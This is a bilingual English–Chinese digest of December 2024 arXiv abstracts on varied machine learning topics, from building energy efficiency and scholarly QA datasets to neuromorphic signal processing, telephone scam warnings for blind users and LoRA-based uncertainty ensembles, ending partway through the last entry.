更新时间: 2024-12-05 10:38:29
领域: stat.ML,cs.LG,math.ST,stat.CO,stat.TH
AI4EF: Artificial Intelligence for Energy Efficiency in the Building Sector
AI4EF, Artificial Intelligence for Energy Efficiency, is an advanced, user-centric tool designed to support decision-making in building energy retrofitting and efficiency optimization. Leveraging machine learning (ML) and data-driven insights, AI4EF enables stakeholders such as public sector representatives, energy consultants, and building owners to model, analyze, and predict energy consumption, retrofit costs, and environmental impacts of building upgrades. Featuring a modular framework, AI4EF includes customizable building retrofitting, photovoltaic installation assessment, and predictive modeling tools that allow users to input building parameters and receive tailored recommendations for achieving energy savings and carbon reduction goals. Additionally, the platform incorporates a Training Playground for data scientists to refine ML models used by said framework. Finally, AI4EF provides access to the Enershare Data Space to facilitate seamless data sharing and access within the ecosystem. Its compatibility with open-source identity management, Keycloak, enhances security and accessibility, making it adaptable for various regulatory and organizational contexts. This paper presents an architectural overview of AI4EF, its application in energy efficiency scenarios, and its potential for advancing sustainable energy practices through artificial intelligence (AI).
Updated: 2024-12-05 10:36:39
标题: AI4EF: 建筑部门能效的人工智能
摘要: AI4EF,能源效率人工智能,是一种先进的、以用户为中心的工具,旨在支持建筑能源改造和效率优化的决策。利用机器学习(ML)和数据驱动的洞见,AI4EF使公共部门代表、能源顾问和建筑业主等利益相关者能够对建筑升级的能源消耗、改造成本和环境影响进行建模、分析和预测。AI4EF具有模块化框架,包括可定制的建筑改造、光伏安装评估和预测建模工具,用户可以输入建筑参数并获得定制建议,以实现节能和减碳目标。此外,该平台还包括一个培训平台,供数据科学家改进所述框架使用的ML模型。最后,AI4EF提供对Enershare数据空间的访问,以促进生态系统内的无缝数据共享和访问。其与开源身份管理系统Keycloak的兼容性增强了安全性和可访问性,使其适应各种监管和组织环境。本文介绍了AI4EF的架构概述,以及其在能源效率场景中的应用,以及通过人工智能(AI)推动可持续能源实践的潜力。
更新时间: 2024-12-05 10:36:39
领域: cs.LG
Hybrid-SQuAD: Hybrid Scholarly Question Answering Dataset
Existing Scholarly Question Answering (QA) methods typically target homogeneous data sources, relying solely on either text or Knowledge Graphs (KGs). However, scholarly information often spans heterogeneous sources, necessitating the development of QA systems that integrate information from multiple heterogeneous data sources. To address this challenge, we introduce Hybrid-SQuAD (Hybrid Scholarly Question Answering Dataset), a novel large-scale QA dataset designed to facilitate answering questions incorporating both text and KG facts. The dataset consists of 10.5K question-answer pairs generated by a large language model, leveraging the KGs DBLP and SemOpenAlex alongside corresponding text from Wikipedia. In addition, we propose a RAG-based baseline hybrid QA model, achieving an exact match score of 69.65 on the Hybrid-SQuAD test set.
Updated: 2024-12-05 10:30:56
标题: 混合SQuAD:混合学术问答数据集
摘要: 现有的学术问答(QA)方法通常针对同质数据源,仅依赖于文本或知识图谱(KG)。然而,学术信息通常跨越异构源,需要开发能够整合多个异构数据源信息的QA系统。为了解决这一挑战,我们引入了Hybrid-SQuAD(混合学术问答数据集),这是一个新颖的大规模QA数据集,旨在促进回答涵盖文本和KG事实的问题。该数据集包含了由大型语言模型生成的10.5K个问题-答案对,利用了KGs DBLP和SemOpenAlex以及来自维基百科的相应文本。此外,我们提出了一个基于RAG的基准混合QA模型,在Hybrid-SQuAD测试集上实现了69.65的精确匹配得分。
更新时间: 2024-12-05 10:30:56
领域: cs.CL,cs.AI
Kernel-Based Optimal Control: An Infinitesimal Generator Approach
This paper presents a novel approach for optimal control of nonlinear stochastic systems using infinitesimal generator learning within infinite-dimensional reproducing kernel Hilbert spaces. Our learning framework leverages data samples of system dynamics and stage cost functions, with only control penalties and constraints provided. The proposed method directly learns the diffusion operator of a controlled Fokker-Planck-Kolmogorov equation in an infinite-dimensional hypothesis space. This operator models the continuous-time evolution of the probability measure of the control system's state. We demonstrate that this approach seamlessly integrates with modern convex operator-theoretic Hamilton-Jacobi-Bellman recursions, enabling a data-driven solution to the optimal control problem. Furthermore, our statistical learning framework includes nonparametric estimators for uncontrolled forward infinitesimal generators as a special case. Numerical experiments, ranging from synthetic differential equations to simulated robotic systems, showcase the advantages of our approach compared to both modern data-driven and classical nonlinear programming methods for optimal control.
Updated: 2024-12-05 10:22:00
标题: 基于核的最优控制:无穷小生成器方法
摘要: 本文提出了一种新颖的方法,利用无穷维再生核希尔伯特空间中的微生成学习来实现非线性随机系统的最优控制。我们的学习框架利用系统动态和阶段成本函数的数据样本,仅提供控制惩罚和约束。所提出的方法直接在无穷维假设空间中学习受控福克-普朗克-科尔莫哥洛夫方程的扩散算子。该算子模拟了控制系统状态的概率测度的连续演化。我们证明了这种方法与现代凸算子理论的哈密尔顿-雅各比-贝尔曼递归无缝集成,实现了最优控制问题的数据驱动解决方案。此外,我们的统计学习框架还包括无控向前无穷小生成器的非参数估计器作为一种特殊情况。从合成微分方程到模拟机器人系统的数值实验展示了我们方法相对于现代数据驱动和经典非线性规划方法在最优控制方面的优势。
更新时间: 2024-12-05 10:22:00
领域: math.OC,cs.LG,cs.RO,cs.SY,eess.SY,stat.ML
INFP: Audio-Driven Interactive Head Generation in Dyadic Conversations
Imagine having a conversation with a socially intelligent agent. It can attentively listen to your words and offer visual and linguistic feedback promptly. This seamless interaction allows for multiple rounds of conversation to flow smoothly and naturally. In pursuit of actualizing it, we propose INFP, a novel audio-driven head generation framework for dyadic interaction. Unlike previous head generation works that only focus on single-sided communication, or require manual role assignment and explicit role switching, our model drives the agent portrait dynamically alternates between speaking and listening state, guided by the input dyadic audio. Specifically, INFP comprises a Motion-Based Head Imitation stage and an Audio-Guided Motion Generation stage. The first stage learns to project facial communicative behaviors from real-life conversation videos into a low-dimensional motion latent space, and use the motion latent codes to animate a static image. The second stage learns the mapping from the input dyadic audio to motion latent codes through denoising, leading to the audio-driven head generation in interactive scenarios. To facilitate this line of research, we introduce DyConv, a large scale dataset of rich dyadic conversations collected from the Internet. Extensive experiments and visualizations demonstrate superior performance and effectiveness of our method. Project Page: https://grisoon.github.io/INFP/.
Updated: 2024-12-05 10:20:34
标题: INFP:音频驱动的双向对话中的交互式头部生成
摘要: 想象一下与一个社交智能代理进行对话。它可以聚精会神地听取你的话语,并及时提供视觉和语言反馈。这种无缝的互动允许多轮对话顺畅自然地流动。为了实现这一目标,我们提出了一种新颖的面部生成框架INFP,用于双向互动。与以往仅关注单向通信的面部生成作品不同,或者需要手动角色分配和明确角色切换的作品相比,我们的模型通过输入双向音频动态地驱动代理人像在说话和倾听状态之间交替,具有指导性。具体而言,INFP包括一个基于动作的头部模仿阶段和一个音频引导的动作生成阶段。第一个阶段学习将来自现实对话视频的面部交际行为投影到低维动作潜空间,并使用动作潜码来为静态图像添加动画。第二阶段学习从输入的双向音频到动作潜码的映射,通过去噪,实现交互场景中的音频驱动头部生成。为了促进这一研究领域的发展,我们引入了DyConv,这是一个从互联网上收集的丰富的双向对话数据集。广泛的实验和可视化展示了我们方法的出色性能和有效性。项目页面:https://grisoon.github.io/INFP/。
更新时间: 2024-12-05 10:20:34
领域: cs.CV,cs.AI
SocialMind: LLM-based Proactive AR Social Assistive System with Human-like Perception for In-situ Live Interactions
Social interactions are fundamental to human life. The recent emergence of large language models (LLMs)-based virtual assistants has demonstrated their potential to revolutionize human interactions and lifestyles. However, existing assistive systems mainly provide reactive services to individual users, rather than offering in-situ assistance during live social interactions with conversational partners. In this study, we introduce SocialMind, the first LLM-based proactive AR social assistive system that provides users with in-situ social assistance. SocialMind employs human-like perception leveraging multi-modal sensors to extract both verbal and nonverbal cues, social factors, and implicit personas, incorporating these social cues into LLM reasoning for social suggestion generation. Additionally, SocialMind employs a multi-tier collaborative generation strategy and proactive update mechanism to display social suggestions on Augmented Reality (AR) glasses, ensuring that suggestions are timely provided to users without disrupting the natural flow of conversation. Evaluations on three public datasets and a user study with 20 participants show that SocialMind achieves 38.3% higher engagement compared to baselines, and 95% of participants are willing to use SocialMind in their live social interactions.
Updated: 2024-12-05 10:19:36
标题: SocialMind:基于LLM的主动式增强现实社交辅助系统,具有类人感知能力,用于现场实时互动
摘要: 社交互动对人类生活至关重要。最近出现的基于大型语言模型(LLMs)的虚拟助手已经展示出它们改变人类互动和生活方式的潜力。然而,现有的辅助系统主要提供对个人用户的反应性服务,而不是在与对话伙伴进行实时社交互动期间提供现场援助。在这项研究中,我们介绍了SocialMind,这是第一个基于LLM的主动式增强现实社交辅助系统,为用户提供现场社交援助。SocialMind利用类人感知,利用多模态传感器提取口头和非口头线索、社交因素和隐含人物,将这些社交线索纳入LLM推理中,用于生成社交建议。此外,SocialMind采用多层协作生成策略和主动更新机制,在增强现实(AR)眼镜上显示社交建议,确保建议及时提供给用户,而不会干扰对话的自然流程。对三个公共数据集的评估和与20名参与者进行的用户研究表明,SocialMind的参与度比基线高出38.3%,95%的参与者愿意在他们的实时社交互动中使用SocialMind。
更新时间: 2024-12-05 10:19:36
领域: cs.AI
Dynamic Graph Representation with Contrastive Learning for Financial Market Prediction: Integrating Temporal Evolution and Static Relations
Temporal Graph Learning (TGL) is crucial for capturing the evolving nature of stock markets. Traditional methods often ignore the interplay between dynamic temporal changes and static relational structures between stocks. To address this issue, we propose the Dynamic Graph Representation with Contrastive Learning (DGRCL) framework, which integrates dynamic and static graph relations to improve the accuracy of stock trend prediction. Our framework introduces two key components: the Embedding Enhancement (EE) module and the Contrastive Constrained Training (CCT) module. The EE module focuses on dynamically capturing the temporal evolution of stock data, while the CCT module enforces static constraints based on stock relations, refined within contrastive learning. This dual-relation approach allows for a more comprehensive understanding of stock market dynamics. Our experiments on two major U.S. stock market datasets, NASDAQ and NYSE, demonstrate that DGRCL significantly outperforms state-of-the-art TGL baselines. Ablation studies indicate the importance of both modules. Overall, DGRCL not only enhances prediction ability but also provides a robust framework for integrating temporal and relational data in dynamic graphs. Code and data are available for public access.
Updated: 2024-12-05 10:15:56
标题: 金融市场预测的对比学习动态图表示:整合时间演化和静态关系
摘要: 时间图学习(TGL)对于捕捉股票市场的演变性质至关重要。传统方法通常忽视股票之间动态的时间变化和静态的关系结构之间的相互作用。为了解决这个问题,我们提出了动态图表示与对比学习(DGRCL)框架,该框架整合了动态和静态图关系以提高股票趋势预测的准确性。我们的框架引入了两个关键组件:嵌入增强(EE)模块和对比约束训练(CCT)模块。EE模块专注于动态捕获股票数据的时间演变,而CCT模块通过对比学习在股票关系上强化静态约束。这种双关系方法使得对股票市场动态有了更全面的理解。我们在两个主要的美国股市数据集,纳斯达克和纽约证券交易所(NYSE)上的实验证明,DGRCL明显优于最先进的TGL基线。消融研究表明了两个模块的重要性。总的来说,DGRCL不仅提高了预测能力,还为在动态图中集成时间和关系数据提供了一个稳健的框架。代码和数据可供公开访问。
更新时间: 2024-12-05 10:15:56
领域: cs.LG,cs.NE,q-fin.CP
Dimension Reduction via Random Projection for Privacy in Multi-Agent Systems
The agents in a Multi-Agent System (MAS) make observations about the system and send that information to a fusion center. The fusion center aggregates the information and concludes about the system parameters with as much accuracy as possible. However for the purposes of better efficiency of the system at large, the agents need to append some private parameters to the observed data. In this scenario, the data sent to the fusion center is faced with privacy risks. The data communicated to the fusion center must be secured against data privacy breaches and inference attacks in a decentralized manner. However, this in turn leads to a loss of utility of the data being sent to the fusion center. We quantify the utility and privacy of the system using Cosine similarity. We formulate our MAS problem in terms of deducing a concept for which compression-based methods are there in literature. Next, we propose a novel sanitization mechanism for our MAS using one such compression-based method while addressing the utility-privacy tradeoff problem.
Updated: 2024-12-05 10:09:13
标题: 多智能体系统中基于随机投影的维度缩减技术用于隐私保护
摘要: 多智能体系统(MAS)中的代理人观察系统并将信息发送到融合中心。融合中心汇总信息并尽可能准确地得出有关系统参数的结论。然而,为了提高系统的效率,代理人需要将一些私人参数附加到观察到的数据中。在这种情况下,发送到融合中心的数据面临隐私风险。传达给融合中心的数据必须以分散的方式确保免受数据隐私泄露和推断攻击。然而,这反过来会导致发送到融合中心的数据的效用损失。我们使用余弦相似度量化系统的效用和隐私。我们将MAS问题制定为推导一个概念,其中文献中存在基于压缩的方法。接下来,我们提出了一种新颖的消毒机制,使用其中一种基于压缩的方法来解决效用-隐私权衡问题。
更新时间: 2024-12-05 10:09:13
领域: cs.CR
Bayesian Networks for Causal Analysis in Socioecological Systems
Causal and counterfactual reasoning are emerging directions in data science that allow us to reason about hypothetical scenarios. This is particularly useful in fields like environmental and ecological sciences, where interventional data are usually not available. Structural causal models are probabilistic models for causal analysis that simplify this kind of reasoning due to their graphical representation. They can be regarded as extensions of the so-called Bayesian networks, a well known modeling tool commonly used in environmental and ecological problems. The main contribution of this paper is to analyze the relations of necessity and sufficiency between the variables of a socioecological system using counterfactual reasoning with Bayesian networks. In particular, we consider a case study involving socioeconomic factors and land-uses in southern Spain. In addition, this paper aims to be a coherent overview of the fundamental concepts for applying counterfactual reasoning, so that environmental researchers with a background in Bayesian networks can easily take advantage of the structural causal model formalism.
Updated: 2024-12-05 10:06:43
标题: 贝叶斯网络在社会生态系统中因果分析中的应用
摘要: 因果推理和反事实推理是数据科学中新兴的方向,使我们能够推理假设情景。这在环境和生态科学等领域特别有用,因为干预数据通常不可用。结构因果模型是用于因果分析的概率模型,通过它们的图形表示简化了这种推理。它们可以被看作是所谓的贝叶斯网络的扩展,这是一种在环境和生态问题中常用的众所周知的建模工具。本文的主要贡献是使用贝叶斯网络的反事实推理分析了社会生态系统变量之间的必要性和充分性关系。特别地,我们考虑了一个涉及西班牙南部社会经济因素和土地利用的案例研究。此外,本文旨在成为一个关于应用反事实推理基本概念的一致概述,以便具备贝叶斯网络背景的环境研究人员能够轻松利用结构因果模型的形式化方法。
更新时间: 2024-12-05 10:06:43
领域: cs.AI,math.PR,stat.AP
Considerations Influencing Offense-Defense Dynamics From Artificial Intelligence
The rapid advancement of artificial intelligence (AI) technologies presents profound challenges to societal safety. As AI systems become more capable, accessible, and integrated into critical services, the dual nature of their potential is increasingly clear. While AI can enhance defensive capabilities in areas like threat detection, risk assessment, and automated security operations, it also presents avenues for malicious exploitation and large-scale societal harm, for example through automated influence operations and cyber attacks. Understanding the dynamics that shape AI's capacity to both cause harm and enhance protective measures is essential for informed decision-making regarding the deployment, use, and integration of advanced AI systems. This paper builds on recent work on offense-defense dynamics within the realm of AI, proposing a taxonomy to map and examine the key factors that influence whether AI systems predominantly pose threats or offer protective benefits to society. By establishing a shared terminology and conceptual foundation for analyzing these interactions, this work seeks to facilitate further research and discourse in this critical area.
Updated: 2024-12-05 10:05:53
标题: 考虑影响人工智能领域攻守动态的因素
摘要: 人工智能(AI)技术的快速发展对社会安全提出了深刻挑战。随着AI系统变得更加强大、可访问和融入关键服务,其潜力的双重性越来越明显。虽然AI可以增强在威胁检测、风险评估和自动安全运营等领域的防御能力,但它也为恶意利用和大规模社会危害开辟了途径,例如通过自动化影响操作和网络攻击。了解塑造AI既能造成伤害又能增强保护措施的动态是为了对部署、使用和整合先进AI系统做出明智决策至关重要。本文基于最近有关AI领域攻守动态的研究,提出了一种分类法,用于绘制和检验影响AI系统主要是构成威胁还是为社会提供保护益处的关键因素。通过建立共享的术语和概念基础来分析这些互动,本研究旨在促进这一关键领域的进一步研究和讨论。
更新时间: 2024-12-05 10:05:53
领域: cs.AI
Quest: Query-centric Data Synthesis Approach for Long-context Scaling of Large Language Model
Recent advancements in large language models (LLMs) have highlighted the importance of extending context lengths for handling complex tasks. While traditional methods for training on long contexts often use filtered long documents, these approaches lead to domain imbalances, limiting model performance. To address this, techniques like random document concatenation (Standard) and similarity-based methods (KNN, ICLM) have been developed. However, they either sacrifice semantic coherence or diversity. To balance both aspects, we introduce Quest, a query-centric data synthesis method aggregating semantically relevant yet diverse documents. Quest uses a generative model to predict potential queries for each document, grouping documents with similar queries and keywords. Extensive experiments demonstrate Quest's superior performance on long-context tasks, achieving remarkable results with context lengths of up to 1M tokens and confirming its scalability across various model sizes.
Updated: 2024-12-05 09:56:35
标题: 《Quest: 针对大型语言模型长上下文扩展的查询中心数据综合方法》
摘要: 最近大型语言模型(LLMs)的最新进展突显了扩展上下文长度以处理复杂任务的重要性。传统的训练长上下文的方法通常使用过滤的长文档,但这些方法会导致领域不平衡,限制模型性能。为了解决这个问题,已经开发了像随机文档串联(标准)和基于相似性的方法(KNN,ICLM)等技术。然而,它们要么牺牲语义连贯性,要么牺牲多样性。为了平衡这两个方面,我们引入了Quest,一种以查询为中心的数据合成方法,聚合语义相关但多样化的文档。Quest使用生成模型为每个文档预测潜在查询,将具有相似查询和关键词的文档分组。广泛的实验表明,Quest在长上下文任务上表现优异,实现了在长达1M标记的上下文长度上取得显著结果,并确认了其在各种模型尺寸上的可扩展性。
更新时间: 2024-12-05 09:56:35
领域: cs.CL,cs.AI
(Blind) Users Really Do Heed Aural Telephone Scam Warnings
This paper reports on a study exploring how two groups of individuals, legally blind (n=36) and sighted ones (n=36), react to aural telephone scam warnings in naturalistic settings. As spoofing a CallerID is trivial, communicating the context of an incoming call instead offers a better possibility to warn a receiver about a potential scam. Usually, such warnings are visual in nature and fail to cater to users with visual disabilities. To address this exclusion, we developed an aural variant of telephone scam warnings and tested them in three conditions: baseline (no warning), short warning, and contextual warning that preceded the scam's content. We tested the two most common scam scenarios: fraud (interest rate reduction) and identity theft (social security number) by cold-calling participants and recording their action, and debriefing and obtaining consent afterward. Only two participants "pressed one" as the scam demanded, both from the legally blind group that heard the contextual warning for the social security scenario. Upon close inspection, we learned that one of them did so because of accessibility issues with their screen reader and the other did so intentionally because the warning convinced them to waste the scammer's time, so they don't scam vulnerable people. Both the legally blind and the sighted participants found the contextual warnings as powerful usable security cues that, together with STIR/SHAKEN indicators like "Scam Likely", would provide robust protection against any type of scam. We also discussed the potential privacy implications of the contextual warnings and collected recommendations for usably accessible implementation.
Updated: 2024-12-05 09:47:38
标题: (盲人)用户确实听从电话诈骗警告
摘要: 本文报告了一项研究,探讨了两组个体(法律盲人n=36和视力正常者n=36)在自然环境中对听觉电话诈骗警告的反应。由于伪装来电者ID很容易,因此通过传达来电的背景,可以更好地警告接收者可能存在的诈骗。通常,此类警告具有视觉性质,无法满足视觉残障用户的需求。为了解决这一排除问题,我们开发了电话诈骗的听觉变体警告,并在三种条件下进行了测试:基线(无警告)、短警告和在诈骗内容之前的语境警告。我们测试了两种最常见的诈骗场景:欺诈(利率降低)和身份盗窃(社会安全号码),通过冷调用参与者并记录其行动,并在之后进行交流并获得同意。只有两名参与者按照诈骗要求“按1”,其中两位来自听觉障碍组,他们听到了社会安全场景的语境警告。经过仔细检查,我们了解到其中一位是因为屏幕阅读器的可访问性问题,另一位是有意为之,因为警告说服他们浪费诈骗者的时间,以防止他们欺骗弱势群体。法律盲人和视力正常的参与者都认为,语境警告是强大的可用安全线索,结合STIR/SHAKEN指示器如“诈骗可能”,将提供强大的保护,防范任何类型的诈骗。我们还讨论了语境警告的潜在隐私影响,并收集了对于可用性访问实施的建议。
更新时间: 2024-12-05 09:47:38
领域: cs.CR
Relax and Merge: A Simple Yet Effective Framework for Solving Fair $k$-Means and $k$-sparse Wasserstein Barycenter Problems
The fairness of clustering algorithms has gained widespread attention across various areas, including machine learning, In this paper, we study fair $k$-means clustering in Euclidean space. Given a dataset comprising several groups, the fairness constraint requires that each cluster should contain a proportion of points from each group within specified lower and upper bounds. Due to these fairness constraints, determining the optimal locations of $k$ centers is a quite challenging task. We propose a novel ``Relax and Merge'' framework that returns a $(1+4\rho + O(\epsilon))$-approximate solution, where $\rho$ is the approximate ratio of an off-the-shelf vanilla $k$-means algorithm and $O(\epsilon)$ can be an arbitrarily small positive number. If equipped with a PTAS of $k$-means, our solution can achieve an approximation ratio of $(5+O(\epsilon))$ with only a slight violation of the fairness constraints, which improves the current state-of-the-art approximation guarantee. Furthermore, using our framework, we can also obtain a $(1+4\rho +O(\epsilon))$-approximate solution for the $k$-sparse Wasserstein Barycenter problem, which is a fundamental optimization problem in the field of optimal transport, and a $(2+6\rho)$-approximate solution for the strictly fair $k$-means clustering with no violation, both of which are better than the current state-of-the-art methods. In addition, the empirical results demonstrate that our proposed algorithm can significantly outperform baseline approaches in terms of clustering cost.
Updated: 2024-12-05 09:45:55
标题: 放松并合并:解决公平$k$-均值和$k$-稀疏Wasserstein质心问题的简单而有效框架
摘要: 聚类算法的公平性已经引起了各个领域的广泛关注,包括机器学习。在本文中,我们研究了欧氏空间中的公平$k$-means聚类。给定一个包含多个群组的数据集,公平性约束要求每个簇应包含来自每个群组的点的比例在指定的下限和上限范围内。由于这些公平性约束,确定$k$个中心的最佳位置是一项非常具有挑战性的任务。我们提出了一个新颖的“Relax and Merge”框架,该框架返回一个$(1+4\rho + O(\epsilon))$-近似解,其中$\rho$是现成的基本$k$-means算法的近似比率,$O(\epsilon)$可以是任意小的正数。如果配备了$k$-means的PTAS,我们的解决方案可以在只轻微违反公平性约束的情况下实现$(5+O(\epsilon))$的近似比率,从而改进了当前的最先进近似保证。此外,使用我们的框架,我们还可以为$k$-sparse Wasserstein Barycenter问题获得一个$(1+4\rho + O(\epsilon))$-近似解,这是最优传输领域中的一个基本优化问题,并且为完全公平的$k$-means聚类问题提供一个$(2+6\rho)$-近似解,两者都优于当前的最先进方法。此外,实证结果表明,我们提出的算法在聚类成本方面可以显著优于基线方法。
更新时间: 2024-12-05 09:45:55
领域: cs.LG,cs.DS,stat.ML
A Note on Spectral Map
In molecular dynamics (MD) simulations, transitions between states are often rare events due to energy barriers that exceed the thermal temperature. Because of their infrequent occurrence and the huge number of degrees of freedom in molecular systems, understanding the physical properties that drive rare events is immensely difficult. A common approach to this problem is to propose a collective variable (CV) that describes this process by a simplified representation. However, choosing CVs is not easy, as it often relies on physical intuition. Machine learning (ML) techniques provide a promising approach for effectively extracting optimal CVs from MD data. Here, we provide a note on a recent unsupervised ML method called spectral map, which constructs CVs by maximizing the timescale separation between slow and fast variables in the system.
Updated: 2024-12-05 09:45:21
标题: 关于光谱图的一点说明
摘要: 在分子动力学(MD)模拟中,状态之间的转变往往是由于超过热温度的能量壁垒而成为罕见事件。由于这些事件的发生频率低以及分子系统中庞大的自由度数量,理解驱动罕见事件的物理性质是非常困难的。解决这个问题的一种常见方法是提出一个描述这一过程的集体变量(CV),通过简化表示。然而,选择CV并不容易,因为它往往依赖于物理直觉。机器学习(ML)技术为有效从MD数据中提取最佳CV提供了一种有希望的方法。在这里,我们提供了关于最近一种无监督ML方法的说明,该方法称为谱图,通过最大化系统中慢变量和快变量之间的时间尺度分离来构建CV。
更新时间: 2024-12-05 09:45:21
领域: physics.chem-ph,cs.LG,physics.bio-ph
Deep-Unrolling Multidimensional Harmonic Retrieval Algorithms on Neuromorphic Hardware
This paper explores the potential of conversion-based neuromorphic algorithms for highly accurate and energy-efficient single-snapshot multidimensional harmonic retrieval (MHR). By casting the MHR problem as a sparse recovery problem, we devise the currently proposed, deep-unrolling-based Structured Learned Iterative Shrinkage and Thresholding (S-LISTA) algorithm to solve it efficiently using complex-valued convolutional neural networks with complex-valued activations, which are trained using a supervised regression objective. Afterward, a novel method for converting the complex-valued convolutional layers and activations into spiking neural networks (SNNs) is developed. At the heart of this method lies the recently proposed Few Spikes (FS) conversion, which is extended by modifying the neuron model's parameters and internal dynamics to account for the inherent coupling between real and imaginary parts in complex-valued computations. Finally, the converted SNNs are mapped onto the SpiNNaker2 neuromorphic board, and a comparison in terms of estimation accuracy and power efficiency between the original CNNs deployed on an NVIDIA Jetson Xavier and the SNNs is being conducted. The measurement results show that the converted SNNs achieve almost five-fold power efficiency at moderate performance loss compared to the original CNNs.
Updated: 2024-12-05 09:41:33
标题: 在神经形态硬件上深度展开多维谐波恢复算法
摘要: 本文探讨了基于转换的神经形态算法在高精度和高能效的单快照多维谐波检索(MHR)中的潜力。通过将MHR问题构建为稀疏恢复问题,我们设计了目前提出的基于深度展开的结构化学习迭代收缩和阈值(S-LISTA)算法,使用复值卷积神经网络和复值激活函数有效地解决该问题,这些网络是使用监督回归目标进行训练的。此后,开发了一种新的方法,将复值卷积层和激活函数转换为尖峰神经网络(SNNs)。该方法的核心是最近提出的Few Spikes(FS)转换,通过修改神经元模型的参数和内部动态以考虑复值计算中实部和虚部之间的固有耦合来扩展它。最后,将转换后的SNNs映射到SpiNNaker2神经形态板上,并进行了原始CNN部署在NVIDIA Jetson Xavier和SNNs之间的估计精度和功率效率比较。测量结果显示,与原始CNN相比,转换后的SNNs在几乎五倍的功率效率下实现了适度性能损失。
更新时间: 2024-12-05 09:41:33
领域: eess.SP,cs.AI,cs.AR,cs.NE
Scaling Laws for Task-Optimized Models of the Primate Visual Ventral Stream
When trained on large-scale object classification datasets, certain artificial neural network models begin to approximate core object recognition (COR) behaviors and neural response patterns in the primate visual ventral stream (VVS). While recent machine learning advances suggest that scaling model size, dataset size, and compute resources improve task performance, the impact of scaling on brain alignment remains unclear. In this study, we explore scaling laws for modeling the primate VVS by systematically evaluating over 600 models trained under controlled conditions on benchmarks spanning V1, V2, V4, IT and COR behaviors. We observe that while behavioral alignment continues to scale with larger models, neural alignment saturates. This observation remains true across model architectures and training datasets, even though models with stronger inductive bias and datasets with higher-quality images are more compute-efficient. Increased scaling is especially beneficial for higher-level visual areas, where small models trained on few samples exhibit only poor alignment. Finally, we develop a scaling recipe, indicating that a greater proportion of compute should be allocated to data samples over model size. Our results suggest that while scaling alone might suffice for alignment with human core object recognition behavior, it will not yield improved models of the brain's visual ventral stream with current architectures and datasets, highlighting the need for novel strategies in building brain-like models.
Updated: 2024-12-05 09:39:07
标题: 灵长类动物视觉腹侧通路任务优化模型的比例定律
摘要: 在大规模物体分类数据集上训练时,某些人工神经网络模型开始逼近灵长类动物视觉腹侧通道(VVS)中的核心物体识别(COR)行为和神经响应模式。尽管最近的机器学习进展表明,模型规模、数据集规模和计算资源的扩展可以提高任务性能,但扩展对大脑对齐的影响仍不清楚。在这项研究中,我们通过系统评估了600多个在跨越V1、V2、V4、IT和COR行为的基准上在受控条件下训练的模型,探索了对建模灵长类VVS的扩展规律。我们观察到,尽管行为对齐随着更大的模型继续扩展,但神经对齐饱和。这一观察结果适用于各种模型架构和训练数据集,即使具有更强的归纳偏差和更高质量图像的模型也更具计算效率。增加扩展对于更高级别的视觉区域特别有益,小型模型在少量样本上训练时只表现出较差的对齐。最后,我们制定了一个扩展配方,表明应将更多的计算资源分配给数据样本而不是模型规模。我们的结果表明,尽管单独扩展可能足以对齐人类核心物体识别行为,但在当前架构和数据集下,它不会产生改进的大脑视觉腹侧通道模型,突显了建立类脑模型的新策略的必要性。
更新时间: 2024-12-05 09:39:07
领域: cs.LG,cs.CV,q-bio.NC
Tight PAC-Bayesian Risk Certificates for Contrastive Learning
Contrastive representation learning is a modern paradigm for learning representations of unlabeled data via augmentations -- precisely, contrastive models learn to embed semantically similar pairs of samples (positive pairs) closer than independently drawn samples (negative samples). In spite of its empirical success and widespread use in foundation models, statistical theory for contrastive learning remains less explored. Recent works have developed generalization error bounds for contrastive losses, but the resulting risk certificates are either vacuous (certificates based on Rademacher complexity or $f$-divergence) or require strong assumptions about samples that are unreasonable in practice. The present paper develops non-vacuous PAC-Bayesian risk certificates for contrastive representation learning, considering the practical considerations of the popular SimCLR framework. Notably, we take into account that SimCLR reuses positive pairs of augmented data as negative samples for other data, thereby inducing strong dependence and making classical PAC or PAC-Bayesian bounds inapplicable. We further refine existing bounds on the downstream classification loss by incorporating SimCLR-specific factors, including data augmentation and temperature scaling, and derive risk certificates for the contrastive zero-one risk. The resulting bounds for contrastive loss and downstream prediction are much tighter than those of previous risk certificates, as demonstrated by experiments on CIFAR-10.
Updated: 2024-12-05 09:26:26
标题: 紧密的PAC-Bayesian风险证书用于对比学习
摘要: 对比表示学习是一种现代范式,通过增强学习未标记数据的表示——准确地说,对比模型学习将语义相似的样本对(正样本)嵌入比独立绘制的样本(负样本)更接近。尽管在基础模型中取得了实证成功并广泛应用,但对比学习的统计理论仍未得到充分探索。最近的研究为对比损失开发了泛化误差界限,但所得到的风险证书要么是空泛的(基于Rademacher复杂度或$f$-分布),要么需要对在实践中不合理的样本做出强假设。本文为对比表示学习开发了非空泛的PAC-Bayesian风险证书,考虑了流行的SimCLR框架的实际考虑因素。值得注意的是,我们考虑到SimCLR重复使用增强数据的正样本对作为其他数据的负样本,从而引入了强依赖性,并使传统PAC或PAC-Bayesian界限不适用。我们进一步通过结合SimCLR特定因素,包括数据增强和温度缩放,对下游分类损失的现有界限进行了改进,并推导了对比零一风险的风险证书。所得到的对比损失和下游预测的界限比先前的风险证书要紧密得多,通过对CIFAR-10的实验证明了这一点。
更新时间: 2024-12-05 09:26:26
领域: stat.ML,cs.LG
LoRA-Ensemble: Efficient Uncertainty Modelling for Self-attention Networks
Numerous crucial tasks in real-world decision-making rely on machine learning algorithms with calibrated uncertainty estimates. However, modern methods often yield overconfident and uncalibrated predictions. Various approaches involve training an ensemble of separate models to quantify the uncertainty related to the model itself, known as epistemic uncertainty. In an explicit implementation, the ensemble approach has high computational cost and high memory requirements. This particular challenge is evident in state-of-the-art neural networks such as transformers, where even a single network is already demanding in terms of compute and memory. Consequently, efforts are made to emulate the ensemble model without actually instantiating separate ensemble members, referred to as implicit ensembling. We introduce LoRA-Ensemble, a parameter-efficient deep ensemble method for self-attention networks, which is based on Low-Rank Adaptation (LoRA). Initially developed for efficient LLM fine-tuning, we extend LoRA to an implicit ensembling approach. By employing a single pre-trained self-attention network with weights shared across all members, we train member-specific low-rank matrices for the attention projections. Our method exhibits superior calibration compared to explicit ensembles and achieves similar or better accuracy across various prediction tasks and datasets.
Updated: 2024-12-05 09:23:13
标题: LoRA-Ensemble: 自注意力网络的高效不确定性建模
